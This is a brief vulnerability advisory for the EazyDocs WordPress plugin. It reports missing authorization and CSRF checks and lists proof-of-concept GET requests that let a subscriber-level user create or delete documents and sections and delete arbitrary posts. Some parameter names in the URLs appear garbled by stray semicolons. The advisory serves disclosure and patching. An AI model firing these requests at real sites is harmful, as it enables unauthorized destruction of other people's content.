Description The plugin does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections.
1. Install the EazyDocs plugin 2. Log in as Subscriber 3. Make GET requests: - To add a document : https://example.com/wp-admin/admin-post.php?Create_doc=yes&parent;_title=doc 1 - To delete a post/document : https://example.com/wp-admin/admin-post.php?Doc_Delete=yes&DeleteID;=12 - To add a section : https://example.com/wp-admin/admin-post.php?Create_Section=yes&parentID;=90&is;_section=sec 1 - To delete a section: https://example.com/wp-admin/admin-post.php?Section_Delete=yes&ID;=110 When making requests, the page will redirect to the login page but the action is still completed, log in as Admin to check the result.